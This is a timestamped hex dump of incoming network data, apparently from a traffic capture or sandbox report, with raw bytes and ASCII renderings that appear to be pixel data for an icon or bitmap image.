                                                                                                                                                        2021-12-28 02:24:04 UTC2035INData Raw: 42 42 42 27 88 88 89 fb b6 b6 b7 ff b8 b8 b9 ff b8 b8 b9 ff b8 b8 b9 ff b8 b8 b9 ff d9 d9 da ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e4 e4 e4 ff 89 8a 8c ff bf 66 1f ff cf 65 10 ff cf 65 11 ff d0 66 11 ff d0 66 12 ff d1 67 12 ff d2 68 13 ff d2 68 13 ff d1 9c 71 ff d1 a8 88 ff d4 6c 18 ff d1 6c 1c ff cb 76 31 ff d4 73 26 ff d7 6c 17 ff d5 8f 57 ff d2 b8 a3 ff d8 74 23 ff d9 70 1c ff da 70 1c ff db 71 1d ff db 72 1e ff dc 73 1f ff dc 73 1f ff dd 74 20 ff de 75 21 ff df 75 21 ff 90 82 77 ff 2a 2a 2a bd 00 00 00 11 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff
                                                                                                                                                        Data Ascii: BBB'feeffghhqllv1s&lWt#ppqrsst u!u!w***
                                                                                                                                                        2021-12-28 02:24:04 UTC2051INData Raw: ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 16 16 16 0d 51 51 51 63 67 66 67 c7 78 78 78 fd 7d 7c 7d ff 7f 7e 7f ff 83 82 83 ff 86 86 88 ff 89 8a 8d ff 8c 8e 91 ff 90 92 95 ff 94 96 9a ff 98 9a 9e ff 9c 9e a1 ff a0 a2 a4 ff a6 a7 a8 ff a9 a9 a9 ff aa aa aa ff a5 a5 a5 ff 94 94 94 ff 6f 6f 6f f3 3d 3d 3d d7 0c 0c 0c ad 00 00 00 7f 00 00 00 49 00 00 00 19 00 00 00 05 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff
                                                                                                                                                        Data Ascii: QQQcgfgxxx}|}~ooo===I
                                                                                                                                                        2021-12-28 02:24:04 UTC2052INData Raw: ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 48 48 48 2f 6c 6c 6c c9 75 74 75 ff 74 73 73 ff 75 76 78 ff 7c 77 74 ff 98 6b 48 ff b0 60 22 ff bf 57 05 ff c2 55 00 ff c2 55 00 ff c1 56 00 ff c1 56 00 ff c1 56 00 ff c1 56 00 ff c1 56 00 ff c1 56 00 ff c1 56 00 ff c1 56 00 ff c2 55 00 ff c1 58 07 ff be 6a 2b ff bc 84 59 ff bc a9 9b ff be c1 c4 ff c3 c3 c4 ff be be be ff 9a 9a 9a fd 54 54 54 e7 10 10 10 b9 00 00 00 87 00 00 00 43 00 00 00 0d ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff
                                                                                                                                                        Data Ascii: HHH/lllututssuvx|wtkH`"WUUVVVVVVVVUXj+YTTTC
                                                                                                                                                        2021-12-28 02:24:04 UTC2068INData Raw: da 71 1d ff da 71 1d ff db 72 1e ff db 72 1e ff db 72 1e ff dc 72 1f ff dc 73 1f ff dc 73 1f ff dd 73 20 ff dd 74 20 ff dd 74 21 ff dd 78 27 ff d0 cf ce ff da 91 57 ff e0 76 21 ff aa 74 4a ff 7b 7c 7e ff 8c 8c 8c ff 9f 9c 99 ff 6d 68 63 ff 50 50 50 ff bc bc bc ff e6 e6 e6 ff 93 93 93 ff 67 67 67 b9 ff ff ff 01 79 7a 7a 4f 8e 89 85 ff 82 82 82 ff 74 74 74 ff 68 69 6b ff d7 79 2f ff e5 7b 27 ff da a7 7f ff d1 cc c8 ff e5 7f 2e ff e6 7d 2a ff e6 7e 2b ff e7 7e 2b ff e7 7e 2b ff e7 7f 2c ff e8 7f 2c ff e8 80 2c ff e8 80 2d ff e8 80 2d ff e9 80 2e ff e9 81 2e ff ea 81 2e ff ea 81 2f ff ea 82 2f ff ea 82 2f ff eb 82 30 ff e8 83 33 ff 75 71 6f ff 73 73 73 ff 12 12 12 bb 00 00 00 47 00 00 00 03 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff
                                                                                                                                                        Data Ascii: qqrrrrsss t t!x'Wv!tJ{|~mhcPPPgggyzzOttthiky/{'.}*~+~+~+,,,--...///03uqosssG
                                                                                                                                                        2021-12-28 02:24:04 UTC2069INData Raw: dd 73 20 ff dd 74 20 ff dd 74 20 ff de 75 21 ff de 75 21 ff de 75 22 ff df 76 22 ff df 76 22 ff df 76 23 ff e0 76 23 ff e0 77 23 ff e1 76 21 ff d7 aa 87 ff d2 c4 b9 ff e1 78 23 ff de 79 28 ff 8d 87 83 ff 98 98 98 ff a8 a8 a9 ff b2 ab a5 ff 5a 59 59 ff 4a 4a 4a ff 9a 9b 9a ff 85 85 85 ff 65 65 65 b3 ff ff ff 01 76 6e 67 a7 89 85 81 ff 78 77 78 ff 6c 6c 6c ff 6d 67 62 ff e5 7e 2d ff e8 7d 28 ff d8 b4 97 ff d2 c7 bd ff e9 7e 2a ff e8 80 2d ff e9 80 2e ff e9 81 2e ff e9 81 2e ff ea 81 2f ff ea 82 2f ff ea 82 2f ff ea 82 30 ff eb 83 30 ff eb 83 30 ff eb 83 31 ff ec 84 31 ff ec 84 31 ff ec 84 32 ff ed 85 32 ff ed 85 33 ff ef 86 32 ff 7b 70 68 ff 72 72 72 ff 14 14 14 bb 00 00 00 45 00 00 00 03 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff
                                                                                                                                                        Data Ascii: s t t u!u!u"v"v"v#v#w#v!x#y(ZYYJJJeeevngxwxlllmgb~-}(~*-...///0001112232{phrrrE
                                                                                                                                                        2021-12-28 02:24:04 UTC2085INData Raw: ef 88 34 ff f0 89 36 ff f1 8a 37 ff f2 8b 38 ff f3 8c 3a ff f5 8e 3b ff f5 8f 3c ff f6 90 3d ff f7 91 3e ff f8 92 3f ff f9 93 40 ff fa 93 41 ff fa 94 42 ff fb 95 43 ff fc 96 44 ff fc 96 44 ff fd 97 44 ff fd 97 45 ff fd 97 44 ff fd 96 44 ff fc 96 44 ff fc 95 43 ff e7 91 4b ff 77 79 7a ff 39 39 39 47 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff
                                                                                                                                                        Data Ascii: 4678:;<=>?@ABCDDDEDDDCKwyz999G
                                                                                                                                                        2021-12-28 02:24:04 UTC2086INData Raw: ef 88 35 ff f0 89 36 ff f1 8a 38 ff f2 8c 39 ff f4 8d 3a ff f5 8e 3b ff f6 8f 3c ff f7 90 3e ff f8 91 3f ff f9 92 40 ff fa 93 41 ff fb 94 42 ff fb 95 43 ff fc 96 43 ff fd 96 44 ff fd 97 45 ff fe 98 45 ff fe 98 46 ff fe 98 46 ff fe 98 46 ff fd 97 45 ff fc 96 44 ff e7 93 4f ff 77 79 7a ff 39 39 39 41 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff
                                                                                                                                                        Data Ascii: 5689:;<>?@ABCCDEEFFFEDOwyz999A
                                                                                                                                                        2021-12-28 02:24:04 UTC2102INData Raw: 78 78 7b ff 7a 7a 7d ff 7a 7a 7e ff 78 78 7c ff 95 95 99 ff b5 b5 b7 ff a0 a0 a2 ff 92 92 93 ff 93 93 94 ff ae ae ae ff cd cd cd ff e9 e9 e9 ff f2 f2 f2 ff f1 f2 f2 ff f1 f1 f1 ff f1 f1 f1 ff f1 f1 f1 ff f1 f1 f1 ff f2 f2 f2 ff f2 f2 f2 ff f2 f2 f2 ff f2 f2 f2 ff f2 f2 f2 ff f3 f3 f3 ff cd ce ce ff 71 71 71 5f ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff
                                                                                                                                                        Data Ascii: xx{zz}zz~xx|qqq_
                                                                                                                                                        2021-12-28 02:24:04 UTC2103INData Raw: ed ed ed ff ee ee ee ff ef ef ef ff f2 f2 f2 ff 8a 8a 8a ff dc dc dc ff f0 f0 f0 ff f0 f0 f0 ff f0 f0 f0 ff f0 f0 f0 ff f0 f0 f0 ff f0 f0 f0 ff f0 f1 f0 ff f1 f1 f1 ff f1 f1 f1 ff f1 f2 f1 ff f2 f2 f2 ff f2 f2 f2 ff f3 f3 f2 ff f3 f3 f3 ff f3 f3 f3 ff f3 f3 f3 ff f3 f3 f3 ff f4 f4 f4 ff f4 f4 f4 ff c9 c9 c8 ff 70 70 70 63 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff
                                                                                                                                                        Data Ascii: pppc
                                                                                                                                                        2021-12-28 02:24:04 UTC2119INData Raw: ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff
                                                                                                                                                        Data Ascii:
                                                                                                                                                        2021-12-28 02:24:04 UTC2120INData Raw: ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff
                                                                                                                                                        Data Ascii:
                                                                                                                                                        2021-12-28 02:24:04 UTC2136INData Raw: ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff
                                                                                                                                                        Data Ascii:
                                                                                                                                                        2021-12-28 02:24:04 UTC2137INData Raw: ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff
                                                                                                                                                        Data Ascii:
                                                                                                                                                        2021-12-28 02:24:04 UTC2153INData Raw: 00 00 00 19 00 00 00 27 00 00 00 37 00 00 00 47 00 00 00 55 00 00 00 5f 00 00 00 65 00 00 00 63 00 00 00 5f 00 00 00 57 00 00 00 4f 00 00 00 47 00 00 00 3f 00 00 00 37 00 00 00 2f 00 00 00 29 00 00 00 23 00 00 00 1d 00 00 00 19 00 00 00 13 00 00 00 0f 00 00 00 0d 00 00 00 09 00 00 00 07 00 00 00 05 00 00 00 03 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff
                                                                                                                                                        Data Ascii: '7GU_ec_WOG?7/)#
                                                                                                                                                        2021-12-28 02:24:04 UTC2154INData Raw: 00 00 00 2b 00 00 00 3f 00 00 00 53 00 00 00 65 00 00 00 75 00 00 00 7f 00 00 00 85 00 00 00 85 00 00 00 81 00 00 00 7b 00 00 00 71 00 00 00 69 00 00 00 61 00 00 00 57 00 00 00 4f 00 00 00 45 00 00 00 3d 00 00 00 37 00 00 00 2f 00 00 00 29 00 00 00 23 00 00 00 1d 00 00 00 19 00 00 00 15 00 00 00 0f 00 00 00 0b 00 00 00 09 00 00 00 07 00 00 00 05 00 00 00 03 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff
                                                                                                                                                        Data Ascii: +?Seu{qiaWOE=7/)#
                                                                                                                                                        2021-12-28 02:24:04 UTC2170INData Raw: b7 b7 b8 ff b7 b7 b8 ff b7 b7 b8 ff b7 b7 b8 ff b6 b6 b7 ff bc bc bd ff df df df ff e4 e4 e4 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e4 e4 e4 ff e5 e5 e5 ff e7 e7 e7 ff e9 e9 e9 ff e4 e4 e4 ff d9 d9 d9 ff c8 c8 c8 ff ac ac ac ff 8d 8d 8d ff 7e 7e 7e ff 73 73 73 ff 71 71 71 ff 74 74 74 ff 79 79 79 ff 7c 7c 7c ff 79 79 79 ff 6c 6c 6c f9 5c 5c 5c ef 3c 3c 3c db 1b 1b 1b c1 43 43 43 dd 7a 79 79
                                                                                                                                                        Data Ascii: ~~~sssqqqtttyyy|||yyylll\\\<<<CCCzyy
                                                                                                                                                        2021-12-28 02:24:04 UTC2171INData Raw: b7 b8 b8 ff b7 b7 b8 ff b7 b7 b8 ff b7 b7 b8 ff b6 b6 b7 ff bc bd bd ff e0 e0 e0 ff e4 e4 e4 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e4 e4 e4 ff e6 e6 e6 ff e8 e8 e8 ff e9 e9 e9 ff e3 e3 e3 ff d7 d7 d7 ff c7 c7 c7 ff a4 a4 a4 ff 89 89 89 ff 7c 7c 7c ff 72 72 72 ff 71 71 71 ff 75 75 75 ff 79 79 79 ff 7c 7c 7c ff 77 77 77 ff 74 74 74 fd 72 71 72
                                                                                                                                                        Data Ascii: |||rrrqqquuuyyy|||wwwtttrqr
                                                                                                                                                        2021-12-28 02:24:04 UTC2187INData Raw: 80 3a 01 ff 80 3a 01 ff 7f 39 01 ff 7f 3a 01 ff 7a 31 00 ff a5 72 48 ff ff ff ff ff ff ff ff ff ff ff fe ff f6 e6 db ff e9 c3 a7 ff de a5 79 ff d2 84 48 ff c6 63 15 ff bf 51 00 ff be 4f 00 ff be 4e 00 ff bf 51 00 ff c1 55 00 ff c1 56 00 ff c1 56 00 ff c1 56 00 ff c1 56 00 ff c2 57 01 ff c2 57 01 ff c2 57 01 ff c2 58 01 ff c3 58 02 ff c3 58 02 ff c3 58 01 ff c2 56 00 ff c2 53 00 ff c2 52 00 ff c2 51 00 ff c5 5d 0a ff c9 70 2a ff d0 8d 57 ff d6 a8 84 ff dc c4 b1 ff e2 dd d9 ff e4 e9 ec ff e4 e9 ed ff e4 e9 ee ff e4 e6 e8 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e7 e7 e7 ff cf cf cf ff 79 79 79 ff 74 73 74
                                                                                                                                                        Data Ascii: ::9:z1rHyHcQONQUVVVVWWWXXXXVSRQ]p*Wyyytst
                                                                                                                                                        2021-12-28 02:24:04 UTC2188INData Raw: 81 3a 01 ff 80 3a 01 ff 80 3a 01 ff 80 3a 01 ff 7a 31 00 ff a8 75 4b ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff f8 ed e4 ff ef d3 be ff e2 b2 8b ff d6 90 5a ff cb 71 2a ff c0 54 00 ff bf 4f 00 ff be 4e 00 ff bf 50 00 ff c1 55 00 ff c2 57 01 ff c2 57 01 ff c2 57 01 ff c2 58 02 ff c3 58 02 ff c3 58 02 ff c3 58 03 ff c4 59 03 ff c4 59 03 ff c4 59 03 ff c4 59 04 ff c4 58 01 ff c4 55 00 ff c4 54 00 ff c3 52 00 ff c6 59 04 ff ca 6c 22 ff ce 83 46 ff d5 9f 74 ff da b7 9b ff df d2 c8 ff e4 e6 e8 ff e4 e9 ec ff e4 e9 ed ff e4 e7 ea ff e3 e4 e4 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e6 e6 e6 ff d5 d5 d5 ff 7b 7b 7b ff 74 74 74
                                                                                                                                                        Data Ascii: ::::z1uKZq*TONPUWWWXXXXYYYYXUTRYl"Ft{{{ttt
                                                                                                                                                        2021-12-28 02:24:04 UTC2204INData Raw: 8d 40 00 ff 8f 43 05 ff 8e 43 05 ff 8e 42 05 ff 8c 41 05 ff a6 4e 07 ff c3 57 00 ff c1 56 00 ff c1 56 00 ff c2 57 01 ff c2 57 01 ff c2 57 01 ff c2 57 01 ff c3 58 02 ff c3 58 02 ff c3 58 03 ff c4 59 03 ff c4 59 03 ff c4 59 03 ff c4 5a 03 ff c5 5a 04 ff c5 5a 04 ff c5 5a 05 ff c5 5b 05 ff c6 5b 06 ff c6 5c 06 ff c7 5c 06 ff c7 5c 07 ff c7 5d 07 ff c8 5d 08 ff c8 5e 08 ff c8 5e 08 ff c9 5e 09 ff c9 5f 09 ff c9 5f 09 ff ca 5f 0a ff ca 5f 0a ff cb 60 0b ff cb 61 0b ff cb 61 0c ff cb 61 0c ff cc 62 0c ff cc 62 0d ff cd 62 0d ff cd 63 0e ff cd 64 0e ff ce 63 0f ff ce 64 0f ff ce 65 10 ff cf 65 10 ff cf 65 11 ff d0 66 11 ff d0 66 11 ff d0 67 12 ff d1 67 12 ff d1 68 12 ff d1 68 13 ff d2 69 13 ff d2 69 14 ff d3 69 14 ff d3 67 11 ff d2 65 0d ff d2 63 0a ff d2 62 07
                                                                                                                                                        Data Ascii: @CCBANWVVWWWWXXXYYYZZZZ[[\\\]]^^^____`aaabbbcdcdeeeffgghhiiigecb
                                                                                                                                                        2021-12-28 02:24:04 UTC2205INData Raw: 90 44 06 ff 90 43 05 ff 90 43 05 ff 8f 43 05 ff 8d 42 05 ff a8 4f 08 ff c3 57 00 ff c1 56 00 ff c1 56 01 ff c2 57 01 ff c2 57 01 ff c2 57 01 ff c3 57 02 ff c3 58 02 ff c3 58 02 ff c3 59 03 ff c4 59 03 ff c4 59 03 ff c4 59 03 ff c5 5a 04 ff c5 5a 04 ff c5 5b 05 ff c5 5b 05 ff c6 5b 05 ff c6 5b 06 ff c6 5c 06 ff c7 5c 07 ff c7 5d 07 ff c7 5d 07 ff c8 5d 08 ff c8 5e 08 ff c9 5e 08 ff c9 5e 09 ff c9 5f 09 ff ca 5f 0a ff ca 60 0a ff cb 60 0b ff cb 61 0b ff cb 61 0c ff cc 62 0c ff cc 62 0c ff cc 62 0d ff cd 63 0d ff cd 63 0e ff ce 63 0e ff ce 64 0f ff ce 64 0f ff cf 65 10 ff cf 65 10 ff cf 66 11 ff d0 66 11 ff d0 66 11 ff d1 67 12 ff d1 67 12 ff d1 68 13 ff d2 68 13 ff d2 68 14 ff d3 69 14 ff d3 69 14 ff d4 6a 15 ff d4 6a 15 ff d4 6a 16 ff d4 6b 16 ff d5 6b 16
                                                                                                                                                        Data Ascii: DCCCBOWVVWWWWXXYYYYZZ[[[[\\]]]^^^__``aabbbcccddeefffgghhhiijjjkk
                                                                                                                                                        2021-12-28 02:24:04 UTC2221INData Raw: b9 78 44 ff 9f 48 00 ff a2 4f 0b ff a1 4e 0b ff a1 4e 0b ff ba 58 0a ff c5 59 02 ff c4 59 03 ff c4 59 03 ff c5 59 04 ff c5 5a 04 ff c5 5a 05 ff c6 5b 05 ff c5 5b 06 ff c6 5c 06 ff c7 5c 06 ff c7 5c 07 ff c8 5d 07 ff c8 5d 08 ff c8 5e 08 ff c8 5e 08 ff c9 5e 09 ff c9 5f 09 ff ca 5f 0a ff ca 60 0b ff ca 60 0b ff cb 61 0c ff cb 61 0c ff cc 62 0d ff cd 62 0d ff cd 63 0d ff cd 63 0e ff ce 64 0f ff ce 64 0f ff ce 65 10 ff cf 65 10 ff d0 66 11 ff d0 67 11 ff d1 67 12 ff d1 67 12 ff d2 68 13 ff d2 69 14 ff d2 69 14 ff d3 6a 14 ff d4 6a 15 ff d4 6b 16 ff d4 6b 16 ff d5 6c 17 ff d5 6c 18 ff d6 6d 18 ff d6 6d 18 ff d7 6e 19 ff d8 6e 1a ff d8 6f 1a ff d9 6f 1b ff d9 70 1b ff d9 70 1c ff da 71 1c ff da 72 1d ff db 72 1d ff db 72 1e ff dc 73 1f ff dd 73 1f ff dd 74 1f
                                                                                                                                                        Data Ascii: xDHONNXYYYYZZ[[\\\]]^^^__``aabbccddeefggghiijjkkllmmnnooppqrrrsst
